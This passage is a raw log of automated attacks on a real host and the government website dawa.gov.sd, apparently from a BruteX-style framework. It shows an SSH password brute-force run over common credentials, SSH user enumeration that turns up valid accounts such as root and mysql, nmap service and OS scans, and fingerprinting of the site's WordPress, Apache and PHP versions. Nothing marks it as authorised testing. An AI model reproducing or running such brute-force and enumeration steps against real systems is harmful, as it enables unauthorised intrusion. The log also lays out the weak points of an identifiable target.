1713. NSE: [ssh-brute] Trying username/password pair: guest:abc123
1714. NSE: [ssh-brute] Trying username/password pair: user:abc123
1715. NSE: [ssh-brute] Trying username/password pair: web:abc123
1716. NSE: [ssh-brute] Trying username/password pair: test:abc123
1717. NSE: [ssh-brute] Trying username/password pair: root:nicole
1718. NSE: [ssh-brute] Trying username/password pair: admin:nicole
1719. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
1720. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
1721. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
1722. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
1723. NSE: [ssh-brute] Trying username/password pair: guest:nicole
1724. NSE: [ssh-brute] Trying username/password pair: user:nicole
1725. NSE: [ssh-brute] Trying username/password pair: web:nicole
1726. NSE: [ssh-brute] Trying username/password pair: test:nicole
1727. NSE: [ssh-brute] Trying username/password pair: root:daniel
1728. NSE: [ssh-brute] Trying username/password pair: admin:daniel
1729. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
1730. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
1731. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
1732. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
1733. NSE: [ssh-brute] Trying username/password pair: guest:daniel
1734. NSE: [ssh-brute] Trying username/password pair: user:daniel
1735. NSE: [ssh-brute] Trying username/password pair: web:daniel
1736. NSE: [ssh-brute] Trying username/password pair: test:daniel
1737. NSE: [ssh-brute] Trying username/password pair: root:monkey
1738. NSE: [ssh-brute] Trying username/password pair: admin:monkey
1739. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
1740. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
1741. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
1742. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
1743. NSE: [ssh-brute] Trying username/password pair: guest:monkey
1744. NSE: [ssh-brute] Trying username/password pair: user:monkey
1745. NSE: [ssh-brute] Trying username/password pair: web:monkey
1746. NSE: [ssh-brute] Trying username/password pair: test:monkey
1747. NSE: [ssh-brute] Trying username/password pair: root:babygirl
1748. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
1749. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
1750. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
1751. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
1752. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
1753. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
1754. NSE: [ssh-brute] Trying username/password pair: user:babygirl
1755. NSE: [ssh-brute] Trying username/password pair: web:babygirl
1756. NSE: [ssh-brute] Trying username/password pair: test:babygirl
1757. NSE: [ssh-brute] Trying username/password pair: root:qwerty
1758. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
1759. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
1760. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
1761. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
1762. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
1763. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
1764. NSE: [ssh-brute] Trying username/password pair: user:qwerty
1765. NSE: [ssh-brute] Trying username/password pair: web:qwerty
1766. NSE: [ssh-brute] Trying username/password pair: test:qwerty
1767. NSE: [ssh-brute] Trying username/password pair: root:lovely
1768. NSE: [ssh-brute] Trying username/password pair: admin:lovely
1769. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
1770. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
1771. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
1772. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
1773. NSE: [ssh-brute] Trying username/password pair: guest:lovely
1774. NSE: [ssh-brute] Trying username/password pair: user:lovely
1775. NSE: [ssh-brute] Trying username/password pair: web:lovely
1776. NSE: [ssh-brute] Trying username/password pair: test:lovely
1777. NSE: [ssh-brute] Trying username/password pair: root:654321
1778. NSE: [ssh-brute] Trying username/password pair: admin:654321
1779. NSE: [ssh-brute] Trying username/password pair: administrator:654321
1780. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
1781. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
1782. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
1783. NSE: [ssh-brute] Trying username/password pair: guest:654321
1784. NSE: [ssh-brute] Trying username/password pair: user:654321
1785. NSE: [ssh-brute] Trying username/password pair: web:654321
1786. NSE: [ssh-brute] Trying username/password pair: test:654321
1787. NSE: [ssh-brute] Trying username/password pair: root:michael
1788. NSE: [ssh-brute] Trying username/password pair: admin:michael
1789. NSE: [ssh-brute] Trying username/password pair: administrator:michael
1790. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
1791. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
1792. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
1793. NSE: [ssh-brute] Trying username/password pair: guest:michael
1794. NSE: [ssh-brute] Trying username/password pair: user:michael
1795. NSE: [ssh-brute] Trying username/password pair: web:michael
1796. NSE: [ssh-brute] Trying username/password pair: test:michael
1797. NSE: [ssh-brute] Trying username/password pair: root:jessica
1798. NSE: [ssh-brute] Trying username/password pair: admin:jessica
1799. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
1800. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
1801. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
1802. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
1803. NSE: [ssh-brute] Trying username/password pair: guest:jessica
1804. NSE: [ssh-brute] Trying username/password pair: user:jessica
1805. NSE: [ssh-brute] Trying username/password pair: web:jessica
1806. NSE: [ssh-brute] Trying username/password pair: test:jessica
1807. NSE: [ssh-brute] Trying username/password pair: root:111111
1808. NSE: [ssh-brute] Trying username/password pair: admin:111111
1809. NSE: [ssh-brute] Trying username/password pair: administrator:111111
1810. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
1811. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
1812. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
1813. NSE: [ssh-brute] Trying username/password pair: guest:111111
1814. NSE: [ssh-brute] Trying username/password pair: user:111111
1815. NSE: [ssh-brute] Trying username/password pair: web:111111
1816. NSE: [ssh-brute] Trying username/password pair: test:111111
1817. NSE: [ssh-brute] Trying username/password pair: root:ashley
1818. NSE: [ssh-brute] Trying username/password pair: admin:ashley
1819. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
1820. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
1821. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
1822. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
1823. NSE: [ssh-brute] Trying username/password pair: guest:ashley
1824. NSE: [ssh-brute] Trying username/password pair: user:ashley
1825. NSE: [ssh-brute] Trying username/password pair: web:ashley
1826. NSE: [ssh-brute] Trying username/password pair: test:ashley
1827. NSE: [ssh-brute] Trying username/password pair: root:000000
1828. NSE: [ssh-brute] Trying username/password pair: admin:000000
1829. NSE: [ssh-brute] Trying username/password pair: administrator:000000
1830. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
1831. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
1832. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
1833. NSE: [ssh-brute] Trying username/password pair: guest:000000
1834. NSE: [ssh-brute] Trying username/password pair: user:000000
1835. NSE: [ssh-brute] Trying username/password pair: web:000000
1836. NSE: [ssh-brute] Trying username/password pair: test:000000
1837. NSE: [ssh-brute] Trying username/password pair: root:iloveu
1838. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
1839. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
1840. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
1841. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
1842. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
1843. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
1844. NSE: [ssh-brute] Trying username/password pair: user:iloveu
1845. NSE: [ssh-brute] Trying username/password pair: web:iloveu
1846. NSE: [ssh-brute] Trying username/password pair: test:iloveu
1847. NSE: [ssh-brute] Trying username/password pair: root:michelle
1848. NSE: [ssh-brute] Trying username/password pair: admin:michelle
1849. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
1850. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
1851. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
1852. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
1853. NSE: [ssh-brute] Trying username/password pair: guest:michelle
1854. NSE: [ssh-brute] Trying username/password pair: user:michelle
1855. NSE: [ssh-brute] Trying username/password pair: web:michelle
1856. NSE: [ssh-brute] Trying username/password pair: test:michelle
1857. NSE: [ssh-brute] Trying username/password pair: root:tigger
1858. NSE: [ssh-brute] Trying username/password pair: admin:tigger
1859. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
1860. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
1861. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
1862. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
1863. NSE: [ssh-brute] Trying username/password pair: guest:tigger
1864. NSE: [ssh-brute] Trying username/password pair: user:tigger
1865. NSE: [ssh-brute] Trying username/password pair: web:tigger
1866. NSE: [ssh-brute] Trying username/password pair: test:tigger
1867. NSE: [ssh-brute] Trying username/password pair: root:sunshine
1868. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
1869. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
1870. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
1871. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
1872. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
1873. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
1874. NSE: [ssh-brute] Trying username/password pair: user:sunshine
1875. NSE: [ssh-brute] Trying username/password pair: web:sunshine
1876. NSE: [ssh-brute] Trying username/password pair: test:sunshine
1877. NSE: [ssh-brute] Trying username/password pair: root:chocolate
1878. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
1879. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
1880. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
1881. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
1882. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
1883. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
1884. NSE: [ssh-brute] Trying username/password pair: user:chocolate
1885. NSE: [ssh-brute] Trying username/password pair: web:chocolate
1886. NSE: [ssh-brute] Trying username/password pair: test:chocolate
1887. NSE: [ssh-brute] Trying username/password pair: root:password1
1888. NSE: [ssh-brute] Trying username/password pair: admin:password1
1889. NSE: [ssh-brute] Trying username/password pair: administrator:password1
1890. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
1891. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
1892. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
1893. NSE: [ssh-brute] Trying username/password pair: guest:password1
1894. NSE: [ssh-brute] Trying username/password pair: user:password1
1895. NSE: [ssh-brute] Trying username/password pair: web:password1
1896. NSE: [ssh-brute] Trying username/password pair: test:password1
1897. NSE: [ssh-brute] Trying username/password pair: root:soccer
1898. NSE: [ssh-brute] Trying username/password pair: admin:soccer
1899. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
1900. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
1901. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
1902. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
1903. NSE: [ssh-brute] Trying username/password pair: guest:soccer
1904. NSE: [ssh-brute] Trying username/password pair: user:soccer
1905. NSE: [ssh-brute] Trying username/password pair: web:soccer
1906. NSE: [ssh-brute] Trying username/password pair: test:soccer
1907. NSE: [ssh-brute] Trying username/password pair: root:anthony
1908. NSE: [ssh-brute] Trying username/password pair: admin:anthony
1909. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
1910. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
1911. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
1912. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
1913. NSE: [ssh-brute] Trying username/password pair: guest:anthony
1914. NSE: [ssh-brute] Trying username/password pair: user:anthony
1915. NSE: [ssh-brute] Trying username/password pair: web:anthony
1916. NSE: [ssh-brute] Trying username/password pair: test:anthony
1917. NSE: [ssh-brute] Trying username/password pair: root:friends
1918. NSE: [ssh-brute] Trying username/password pair: admin:friends
1919. NSE: [ssh-brute] Trying username/password pair: administrator:friends
1920. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
1921. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
1922. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
1923. NSE: [ssh-brute] Trying username/password pair: guest:friends
1924. NSE: [ssh-brute] Trying username/password pair: user:friends
1925. NSE: [ssh-brute] Trying username/password pair: web:friends
1926. NSE: [ssh-brute] Trying username/password pair: test:friends
1927. NSE: [ssh-brute] Trying username/password pair: root:purple
1928. NSE: [ssh-brute] Trying username/password pair: admin:purple
1929. NSE: [ssh-brute] Trying username/password pair: administrator:purple
1930. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
1931. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
1932. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
1933. NSE: [ssh-brute] Trying username/password pair: guest:purple
1934. NSE: [ssh-brute] Trying username/password pair: user:purple
1935. NSE: [ssh-brute] Trying username/password pair: web:purple
1936. NSE: [ssh-brute] Trying username/password pair: test:purple
1937. NSE: [ssh-brute] Trying username/password pair: root:angel
1938. NSE: [ssh-brute] Trying username/password pair: admin:angel
1939. NSE: [ssh-brute] Trying username/password pair: administrator:angel
1940. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
1941. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
1942. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
1943. NSE: [ssh-brute] Trying username/password pair: guest:angel
1944. NSE: [ssh-brute] Trying username/password pair: user:angel
1945. NSE: [ssh-brute] Trying username/password pair: web:angel
1946. NSE: [ssh-brute] Trying username/password pair: test:angel
1947. NSE: [ssh-brute] Trying username/password pair: root:butterfly
1948. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
1949. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
1950. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
1951. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
1952. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
1953. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
1954. NSE: [ssh-brute] Trying username/password pair: user:butterfly
1955. NSE: [ssh-brute] Trying username/password pair: web:butterfly
1956. NSE: [ssh-brute] Trying username/password pair: test:butterfly
1957. NSE: [ssh-brute] Trying username/password pair: root:jordan
1958. NSE: [ssh-brute] Trying username/password pair: admin:jordan
1959. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
1960. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
1961. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
1962. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
1963. NSE: [ssh-brute] Trying username/password pair: guest:jordan
1964. NSE: [ssh-brute] Trying username/password pair: user:jordan
1965. NSE: [ssh-brute] Trying username/password pair: web:jordan
1966. NSE: [ssh-brute] Trying username/password pair: test:jordan
1967. NSE: [ssh-brute] Trying username/password pair: root:fuckyou
1968. NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
1969. NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
1970. NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
1971. NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
1972. NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
1973. NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
1974. NSE: [ssh-brute] Trying username/password pair: user:fuckyou
1975. NSE: [ssh-brute] Trying username/password pair: web:fuckyou
1976. NSE: [ssh-brute] Trying username/password pair: test:fuckyou
1977. NSE: [ssh-brute] Trying username/password pair: root:123123
1978. NSE: [ssh-brute] Trying username/password pair: admin:123123
1979. NSE: [ssh-brute] Trying username/password pair: administrator:123123
1980. NSE: [ssh-brute] Trying username/password pair: webadmin:123123
1981. NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
1982. NSE: [ssh-brute] Trying username/password pair: netadmin:123123
1983. NSE: [ssh-brute] Trying username/password pair: guest:123123
1984. NSE: [ssh-brute] Trying username/password pair: user:123123
1985. NSE: [ssh-brute] Trying username/password pair: web:123123
1986. NSE: [ssh-brute] Trying username/password pair: test:123123
1987. NSE: [ssh-brute] Trying username/password pair: root:justin
1988. NSE: [ssh-brute] Trying username/password pair: admin:justin
1989. NSE: [ssh-brute] Trying username/password pair: administrator:justin
1990. NSE: [ssh-brute] Trying username/password pair: webadmin:justin
1991. NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
1992. NSE: [ssh-brute] Trying username/password pair: netadmin:justin
1993. NSE: [ssh-brute] Trying username/password pair: guest:justin
1994. NSE: [ssh-brute] Trying username/password pair: user:justin
1995. NSE: [ssh-brute] Trying username/password pair: web:justin
1996. NSE: [ssh-brute] Trying username/password pair: test:justin
1997. NSE: [ssh-brute] Trying username/password pair: root:liverpool
1998. NSE: [ssh-brute] Trying username/password pair: admin:liverpool
1999. NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
2000. NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
2001. NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
2002. NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
2003. NSE: [ssh-brute] Trying username/password pair: guest:liverpool
2004. NSE: [ssh-brute] Trying username/password pair: user:liverpool
2005. NSE: [ssh-brute] Trying username/password pair: web:liverpool
2006. NSE: [ssh-brute] Trying username/password pair: test:liverpool
2007. NSE: [ssh-brute] Trying username/password pair: root:football
2008. NSE: [ssh-brute] Trying username/password pair: admin:football
2009. NSE: [ssh-brute] Trying username/password pair: administrator:football
2010. NSE: [ssh-brute] Trying username/password pair: webadmin:football
2011. NSE: [ssh-brute] Trying username/password pair: sysadmin:football
2012. NSE: [ssh-brute] Trying username/password pair: netadmin:football
2013. NSE: [ssh-brute] Trying username/password pair: guest:football
2014. NSE: [ssh-brute] Trying username/password pair: user:football
2015. NSE: [ssh-brute] Trying username/password pair: web:football
2016. NSE: [ssh-brute] Trying username/password pair: test:football
2017. NSE: [ssh-brute] Trying username/password pair: root:loveme
2018. NSE: [ssh-brute] Trying username/password pair: admin:loveme
2019. NSE: [ssh-brute] Trying username/password pair: administrator:loveme
2020. NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
2021. NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
2022. NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
2023. NSE: [ssh-brute] Trying username/password pair: guest:loveme
2024. NSE: [ssh-brute] Trying username/password pair: user:loveme
2025. NSE: [ssh-brute] Trying username/password pair: web:loveme
2026. NSE: [ssh-brute] Trying username/password pair: test:loveme
2027. NSE: [ssh-brute] Trying username/password pair: root:secret
2028. Nmap scan report for 37.58.63.157
2029. Host is up (0.12s latency).
2030.  
2031. PORT STATE SERVICE VERSION
2032. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2033. | ssh-auth-methods:
2034. | Supported authentication methods:
2035. | publickey
2036. | gssapi-keyex
2037. | gssapi-with-mic
2038. |_ password
2039. | ssh-brute:
2040. | Accounts: No valid accounts found
2041. |_ Statistics: Performed 421 guesses in 181 seconds, average tps: 2.6
2042. | ssh-hostkey:
2043. | 2048 f9:ea:f1:f9:88:4c:35:23:4f:31:fb:38:17:f9:40:39 (RSA)
2044. | 256 8c:07:13:65:fe:ef:69:09:f4:fb:ee:49:91:5a:33:38 (ECDSA)
2045. |_ 256 37:44:b4:9d:a4:1f:48:a1:d0:60:fe:4a:73:6c:99:67 (ED25519)
2046. | ssh-publickey-acceptance:
2047. |_ Accepted Public Keys: No public keys accepted
2048. |_ssh-run: Failed to specify credentials and command to run.
2049. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2050. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), HP P2000 G3 NAS device (93%), Linux 3.12 (92%)
2051. No exact OS matches for host (test conditions non-ideal).
2052. Network Distance: 14 hops
2053.  
2054. TRACEROUTE (using port 22/tcp)
2055. HOP RTT ADDRESS
2056. 1 24.85 ms 10.246.200.1
2057. 2 20.86 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
2058. 3 32.80 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
2059. 4 25.88 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
2060. 5 27.10 ms motl-b1-link.telia.net (62.115.162.41)
2061. 6 124.79 ms nyk-bb4-link.telia.net (62.115.134.52)
2062. 7 124.82 ms ldn-bb4-link.telia.net (62.115.112.245)
2063. 8 124.82 ms prs-bb4-link.telia.net (62.115.114.229)
2064. 9 124.78 ms ffm-bb3-link.telia.net (62.115.123.12)
2065. 10 146.82 ms ffm-b10-link.telia.net (62.115.137.211)
2066. 11 119.86 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
2067. 12 118.83 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
2068. 13 ...
2069. 14 118.82 ms 37.58.63.157
2070. #######################################################################################################################################
2071. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2072. RHOSTS => 37.58.63.157
2073. RHOST => 37.58.63.157
2074. [*] 37.58.63.157:22 - SSH - Using malformed packet technique
2075. [*] 37.58.63.157:22 - SSH - Starting scan
2076. [-] 37.58.63.157:22 - SSH - User 'admin' not found
2077. [-] 37.58.63.157:22 - SSH - User 'administrator' not found
2078. [-] 37.58.63.157:22 - SSH - User 'anonymous' not found
2079. [-] 37.58.63.157:22 - SSH - User 'backup' not found
2080. [-] 37.58.63.157:22 - SSH - User 'bee' not found
2081. [+] 37.58.63.157:22 - SSH - User 'ftp' found
2082. [-] 37.58.63.157:22 - SSH - User 'guest' not found
2083. [-] 37.58.63.157:22 - SSH - User 'GUEST' not found
2084. [-] 37.58.63.157:22 - SSH - User 'info' not found
2085. [+] 37.58.63.157:22 - SSH - User 'mail' found
2086. [-] 37.58.63.157:22 - SSH - User 'mailadmin' not found
2087. [-] 37.58.63.157:22 - SSH - User 'msfadmin' not found
2088. [+] 37.58.63.157:22 - SSH - User 'mysql' found
2089. [+] 37.58.63.157:22 - SSH - User 'nobody' found
2090. [-] 37.58.63.157:22 - SSH - User 'oracle' not found
2091. [-] 37.58.63.157:22 - SSH - User 'owaspbwa' not found
2092. [+] 37.58.63.157:22 - SSH - User 'postfix' found
2093. [-] 37.58.63.157:22 - SSH - User 'postgres' not found
2094. [-] 37.58.63.157:22 - SSH - User 'private' not found
2095. [-] 37.58.63.157:22 - SSH - User 'proftpd' not found
2096. [-] 37.58.63.157:22 - SSH - User 'public' not found
2097. [+] 37.58.63.157:22 - SSH - User 'root' found
2098. [-] 37.58.63.157:22 - SSH - User 'superadmin' not found
2099. [-] 37.58.63.157:22 - SSH - User 'support' not found
2100. [-] 37.58.63.157:22 - SSH - User 'sys' not found
2101. [-] 37.58.63.157:22 - SSH - User 'system' not found
2102. [-] 37.58.63.157:22 - SSH - User 'systemadmin' not found
2103. [-] 37.58.63.157:22 - SSH - User 'systemadministrator' not found
2104. [-] 37.58.63.157:22 - SSH - User 'test' not found
2105. [-] 37.58.63.157:22 - SSH - User 'tomcat' not found
2106. [-] 37.58.63.157:22 - SSH - User 'user' not found
2107. [-] 37.58.63.157:22 - SSH - User 'webmaster' not found
2108. [-] 37.58.63.157:22 - SSH - User 'www-data' not found
2109. [-] 37.58.63.157:22 - SSH - User 'Fortimanager_Access' not found
2110. [*] Scanned 1 of 1 hosts (100% complete)
2111. [*] Auxiliary module execution completed
2112. #######################################################################################################################################
2113. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:29 EDT
2114. Nmap scan report for 37.58.63.157
2115. Host is up (0.11s latency).
2116.  
2117. PORT STATE SERVICE VERSION
2118. 53/tcp open domain (unknown banner: none)
2119. |_dns-fuzz: Server didn't response to our probe, can't fuzz
2120. |_dns-nsec-enum: Can't determine domain for host 37.58.63.157; use dns-nsec-enum.domains script arg.
2121. |_dns-nsec3-enum: Can't determine domain for host 37.58.63.157; use dns-nsec3-enum.domains script arg.
2122. | dns-nsid:
2123. |_ bind.version: none
2124. | fingerprint-strings:
2125. | DNSVersionBindReqTCP:
2126. | version
2127. | bind
2128. |_ none
2129. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
2130. SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCAD4B8%P=x86_64-pc-linux-gnu%r(DNSVe
2131. SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
2132. SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
2133. SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
2134. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2135. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (92%), Linux 3.2 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%)
2136. No exact OS matches for host (test conditions non-ideal).
2137. Network Distance: 14 hops
2138.  
2139. Host script results:
2140. |_dns-brute: Can't guess domain of "37.58.63.157"; use dns-brute.domain script argument.
2141.  
2142. TRACEROUTE (using port 53/tcp)
2143. HOP RTT ADDRESS
2144. 1 20.97 ms 10.246.200.1
2145. 2 22.01 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
2146. 3 26.52 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
2147. 4 20.52 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
2148. 5 26.89 ms motl-b1-link.telia.net (62.115.162.41)
2149. 6 120.00 ms nyk-bb4-link.telia.net (62.115.134.52)
2150. 7 122.32 ms ldn-bb3-link.telia.net (62.115.113.21)
2151. 8 119.98 ms prs-bb3-link.telia.net (62.115.134.92)
2152. 9 120.06 ms ffm-bb4-link.telia.net (62.115.114.99)
2153. 10 119.54 ms ffm-b10-link.telia.net (62.115.137.211)
2154. 11 114.60 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
2155. 12 114.22 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
2156. 13 116.60 ms hosted-by.leaseweb.com (46.165.226.255)
2157. 14 114.35 ms 37.58.63.157
2158. #######################################################################################################################################
2159. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:30 EDT
2160. Nmap scan report for 37.58.63.157
2161. Host is up (0.11s latency).
2162.  
2163. PORT STATE SERVICE VERSION
2164. 68/udp open|filtered dhcpc
2165. Too many fingerprints match this host to give specific OS details
2166. Network Distance: 14 hops
2167.  
2168. TRACEROUTE (using proto 1/icmp)
2169. HOP RTT ADDRESS
2170. 1 25.56 ms 10.246.200.1
2171. 2 21.16 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
2172. 3 42.84 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
2173. 4 20.23 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
2174. 5 26.87 ms motl-b1-link.telia.net (62.115.162.41)
2175. 6 124.40 ms nyk-bb3-link.telia.net (62.115.137.142)
2176. 7 124.45 ms ldn-bb4-link.telia.net (62.115.112.245)
2177. 8 121.27 ms prs-bb4-link.telia.net (62.115.114.229)
2178. 9 120.62 ms ffm-bb4-link.telia.net (62.115.114.99)
2179. 10 119.84 ms ffm-b10-link.telia.net (62.115.137.211)
2180. 11 113.42 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
2181. 12 113.18 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
2182. 13 120.71 ms hosted-by.leaseweb.com (46.165.226.255)
2183. 14 113.29 ms 37.58.63.157
2184. #######################################################################################################################################
2185. wig - WebApp Information Gatherer
2186.  
2187.  
2188. Scanning http://dawa.gov.sd...
2189. ________________________________________ SITE INFO _________________________________________
2190. IP Title
2191. 37.58.63.157
2192.  
2193. _________________________________________ VERSION __________________________________________
2194. Name Versions Type
2195. WordPress 5.0.4 CMS
2196. Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
2197. 2.4.8 | 2.4.9
2198. PHP 7.0.33 Platform
2199.  
2200. _______________________________________ INTERESTING ________________________________________
2201. URL Note Type
2202. /robots.txt robots.txt index Interesting
2203. /readme.html Readme file Interesting
2204. /login/ Login Page Interesting
2205.  
2206. __________________________________________ TOOLS ___________________________________________
